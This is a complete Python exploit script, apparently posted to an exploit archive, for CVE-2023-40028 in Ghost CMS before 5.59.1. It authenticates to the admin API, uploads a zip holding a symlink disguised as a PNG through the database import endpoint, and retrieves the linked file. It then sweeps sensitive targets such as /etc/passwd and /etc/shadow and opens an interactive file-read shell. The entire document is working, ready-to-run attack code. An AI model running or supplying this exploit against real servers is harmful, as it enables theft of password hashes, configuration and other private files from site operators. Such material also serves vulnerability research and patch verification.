1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
# Exploit Title: Ghost CMS 5.59.1 - Arbitrary File Read
# Date: 2023-09-20
# Exploit Author: ibrahimsql (https://github.com/ibrahmsql)
# Vendor Homepage: https://ghost.org
# Software Link: https://github.com/TryGhost/Ghost
# Version: < 5.59.1
# Tested on: Ubuntu 20.04 LTS, Windows 10, macOS Big Sur
# CVE: CVE-2023-40028
# Category: Web Application Security
# CVSS Score: 6.5 (Medium)
# Description:
# Ghost CMS versions prior to 5.59.1 contain a vulnerability that allows authenticated users
# to upload files that are symlinks. This can be exploited to perform arbitrary file reads
# of any file on the host operating system. The vulnerability exists in the file upload
# mechanism which improperly validates symlink files, allowing attackers to access files
# outside the intended directory structure through symlink traversal.
# Requirements: requests>=2.28.1, zipfile, tempfile
# Usage Examples:
# python3 CVE-2023-40028.py http://localhost:2368 admin@example.com password123
# python3 CVE-2023-40028.py https://ghost.example.com user@domain.com mypassword
# Interactive Usage:
# After running the script, you can use the interactive shell to read files:
# file> /etc/passwd
# file> /etc/shadow
# file> /var/log/ghost/ghost.log
# file> exit
"""
import requests
import sys
import os
import tempfile
import zipfile
import random
import string
from typing import Optional
class ExploitResult:
def __init__(self):
self.success = False
self.file_content = ""
self.status_code = 0
self.description = "Ghost CMS < 5.59.1 allows authenticated users to upload symlink files for arbitrary file read"
self.severity = "Medium"
class GhostArbitraryFileRead:
def __init__(self, ghost_url: str, username: str, password: str, verbose: bool = True):
self.ghost_url = ghost_url.rstrip('/')
self.username = username
self.password = password
self.verbose = verbose
self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.9'
})
self.api_url = f"{self.ghost_url}/ghost/api/v3/admin"
def authenticate(self) -> bool:
"""Authenticate with Ghost CMS admin panel"""
login_data = {
'username': self.username,
'password': self.password
}
headers = {
'Origin': self.ghost_url,
'Accept-Version': 'v3.0',
'Content-Type': 'application/json'
}
try:
response = self.session.post(
f"{self.api_url}/session/",
json=login_data,
headers=headers,
timeout=10
)
if response.status_code == 201:
if self.verbose:
print("[+] Successfully authenticated with Ghost CMS")
return True
else:
if self.verbose:
print(f"[-] Authentication failed: {response.status_code}")
return False
except requests.RequestException as e:
if self.verbose:
print(f"[-] Authentication error: {e}")
return False
def generate_random_name(self, length: int = 13) -> str:
"""Generate random string for image name"""
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
def create_exploit_zip(self, target_file: str) -> Optional[str]:
"""Create exploit zip file with symlink"""
try:
# Create temporary directory
temp_dir = tempfile.mkdtemp()
exploit_dir = os.path.join(temp_dir, 'exploit')
images_dir = os.path.join(exploit_dir, 'content', 'images', '2024')
os.makedirs(images_dir, exist_ok=True)
# Generate random image name
image_name = f"{self.generate_random_name()}.png"
symlink_path = os.path.join(images_dir, image_name)
# Create symlink to target file
os.symlink(target_file, symlink_path)
# Create zip file
zip_path = os.path.join(temp_dir, 'exploit.zip')
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
for root, dirs, files in os.walk(exploit_dir):
for file in files:
file_path = os.path.join(root, file)
arcname = os.path.relpath(file_path, temp_dir)
zipf.write(file_path, arcname)
return zip_path, image_name
except Exception as e:
if self.verbose:
print(f"[-] Error creating exploit zip: {e}")
return None, None
def upload_exploit(self, zip_path: str) -> bool:
"""Upload exploit zip file to Ghost CMS"""
try:
headers = {
'X-Ghost-Version': '5.58',
'X-Requested-With': 'XMLHttpRequest',
'Origin': self.ghost_url,
'Referer': f"{self.ghost_url}/ghost/"
}
with open(zip_path, 'rb') as f:
files = {
'importfile': ('exploit.zip', f, 'application/zip')
}
response = self.session.post(
f"{self.api_url}/db",
files=files,
headers=headers,
timeout=30
)
if response.status_code in [200, 201]:
if self.verbose:
print("[+] Exploit zip uploaded successfully")
return True
else:
if self.verbose:
print(f"[-] Upload failed: {response.status_code}")
return False
except requests.RequestException as e:
if self.verbose:
print(f"[-] Upload error: {e}")
return False
def read_file(self, target_file: str) -> ExploitResult:
"""Read arbitrary file using symlink upload"""
result = ExploitResult()
if not self.authenticate():
return result
if self.verbose:
print(f"[*] Attempting to read file: {target_file}")
# Create exploit zip
zip_path, image_name = self.create_exploit_zip(target_file)
if not zip_path:
return result
try:
# Upload exploit
if self.upload_exploit(zip_path):
# Try to access the symlinked file
file_url = f"{self.ghost_url}/content/images/2024/{image_name}"
response = self.session.get(file_url, timeout=10)
if response.status_code == 200 and len(response.text) > 0:
result.success = True
result.file_content = response.text
result.status_code = response.status_code
if self.verbose:
print(f"[+] Successfully read file: {target_file}")
print(f"[+] File content length: {len(response.text)} bytes")
else:
if self.verbose:
print(f"[-] Failed to read file: {response.status_code}")
except Exception as e:
if self.verbose:
print(f"[-] Error during exploit: {e}")
finally:
# Cleanup
try:
if zip_path and os.path.exists(zip_path):
os.remove(zip_path)
temp_dir = os.path.dirname(zip_path) if zip_path else None
if temp_dir and os.path.exists(temp_dir):
import shutil
shutil.rmtree(temp_dir)
except:
pass
return result
def interactive_shell(self):
"""Interactive shell for file reading"""
print("\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Shell ===")
print("Enter file paths to read (type 'exit' to quit)")
while True:
try:
file_path = input("file> ").strip()
if file_path.lower() == 'exit':
print("Bye Bye!")
break
if not file_path:
print("Please enter a file path")
continue
if ' ' in file_path:
print("Please enter full file path without spaces")
continue
result = self.read_file(file_path)
if result.success:
print(f"\n--- Content of {file_path} ---")
print(result.file_content)
print("--- End of file ---\n")
else:
print(f"Failed to read file: {file_path}")
except KeyboardInterrupt:
print("\nExiting...")
break
except Exception as e:
print(f"Error: {e}")
def main():
if len(sys.argv) != 4:
print("Usage: python3 CVE-2023-40028.py <ghost_url> <username> <password>")
print("Example: python3 CVE-2023-40028.py http://localhost:2368 admin@example.com password123")
return
ghost_url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
exploit = GhostArbitraryFileRead(ghost_url, username, password, verbose=True)
# Test with common sensitive files
test_files = [
"/etc/passwd",
"/etc/shadow",
"/etc/hosts",
"/proc/version",
"/var/log/ghost/ghost.log"
]
print("\n=== CVE-2023-40028 Ghost CMS Arbitrary File Read Exploit ===")
print(f"Target: {ghost_url}")
print(f"Username: {username}")
# Test authentication first
if not exploit.authenticate():
print("[-] Authentication failed. Please check credentials.")
return
print("\n[*] Testing common sensitive files...")
for test_file in test_files:
result = exploit.read_file(test_file)
if result.success:
print(f"[+] Successfully read: {test_file}")
print(f" Content preview: {result.file_content[:100]}...")
else:
print(f"[-] Failed to read: {test_file}")
# Start interactive shell
exploit.interactive_shell()
if __name__ == "__main__":
main()
|